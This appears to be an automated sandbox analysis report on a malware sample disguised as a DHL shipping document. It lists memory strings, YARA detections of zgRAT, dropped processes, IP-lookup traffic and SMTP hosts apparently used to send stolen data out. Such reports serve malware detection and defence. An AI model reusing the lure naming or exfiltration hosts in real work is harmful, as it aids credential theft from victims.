                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D72000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A029000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023CC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.thanhphoung-vn.com
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002493000.00000004.00000800.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.000000000247E000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023E2000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.00000000023F7000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.00000000028EE000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.0000000002903000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                  Source: InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.555838851.0000000002401000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.556924562.0000000002361000.00000004.00000800.00020000.00000000.sdmp, KbWSe.exe, 00000017.00000002.558518953.000000000287C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Xubyeworypu.tmpdb.17.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417ED8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417DA1000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome?p=update_error
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=update_error8
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/chrome?p=update_errorFix
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://support.google.com/installer/?product=
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417E66000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.0000029417EF3000.00000004.00000800.00020000.00000000.sdmp, Unjsdaqackg.tmpdb.17.dr, Xubyeworypu.tmpdb.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/8
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417EBF000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/Google
                  Source: InstallUtil.exe, 00000011.00000002.552825754.0000029417ECC000.00000004.00000800.00020000.00000000.sdmp, Spsfpf.tmpdb.17.dr, Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                  Source: Lfzmsuaggmw.tmpdb.17.drString found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
                  Source: explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49697 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49701 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: initial sampleStatic PE information: Filename: DHL_Shipping_Document2.exe
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C29A3
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeCode function: 0_2_00007FFBAD3C0C00
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DC978
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DA9B8
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022D9DA0
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022D02BF
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DA0E8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD400CAA
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD403EDF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeCode function: 17_2_00007FFBAD40BDE8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AA0E8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AC978
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021AA9B8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021A9DA0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 19_2_021A07A2
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA9B8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFC978
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF5AD0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF9DA0
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA0DC
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DFA0E8
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF5A80
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF7A44
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeCode function: 23_2_00DF3B48
                  Source: DHL_Shipping_Document2.exe, 00000000.00000000.255501089.0000019909E32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDHL Shipping Document2.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFmdxqenedkdyqyti.dll" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BB02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.390559945.0000019909F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCLIENTS.exe" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000003.378760182.000001991D412000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BF6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000003.378760182.000001991D3BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea8eb5b4e-e105-4f1d-aa30-476080d81880.exe4 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFmdxqenedkdyqyti.dll" vs DHL_Shipping_Document2.exe
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs DHL_Shipping_Document2.exe
